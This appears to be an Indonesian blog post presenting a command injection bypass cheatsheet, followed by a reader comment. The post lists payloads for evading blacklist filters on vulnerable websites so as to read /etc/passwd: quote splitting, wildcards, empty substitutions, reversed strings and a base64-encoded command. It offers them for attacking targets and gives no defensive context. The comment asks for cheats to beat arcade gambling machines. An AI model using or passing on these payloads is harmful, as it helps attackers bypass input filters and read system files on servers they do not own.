Command Injection Bypass Cheatsheet. Adakalanya saat kita melakukan command injection pada website atau aplikasi yang rentan command atau perintah yang kita kirim diblock karena mengandung kata yang sudah diblacklist. nah di tutorial ini saya akan sharing bagaimana caya membypass blacklist tersebut.
Command Injection Bypass Cheatsheet
Di contoh ini saya menggunakan perintah untuk melihat /etc/passwd .
Normal command :
cat etc/passwd
Command with Quote
cat /e"t"c/pa"s"swd cat /'e'tc/pa's'swd
Wildcard
cat /etc/pa??wd cat /etc/pa*wd
Null variable
cat /et``c/passw``d
cat /et$()c/pa$()sswd
cat /et${neko}c/pas${poi}swd
Reverse & Encode command
`echo "dwssap/cte/ tac" | rev` $(echo Y2F0IC9ldGMvcGFzc3dkCg== | base64 -d)
Oke mungkin sekian sharing kali ini, jika ada yang ingin ditambahkan silahkan komentar.
Masta..di daerah saya nih, Sumatera utara kali ini menjamur mesin judi tembak ikan (mesin arcade) seperti yang dijual di alibaba.com..susah menjelaskan spesifik programnya karena saya juga ga paham, hehehe..yang pasti mesin judi tembak ikan tersebut kasat mata adalah program komputer..dan di alibaba.com juga dijual anti-cheater alaram.Dengan kata lain ada dong cheatnya untuk ngakalin tuh mesin..hehehehe..saya dan beberapa rekan lainnya termasuk player setia mesin judi tuh tapi kalah terus…mohon dong pencerahan dan solusinya (cheatnya) masta..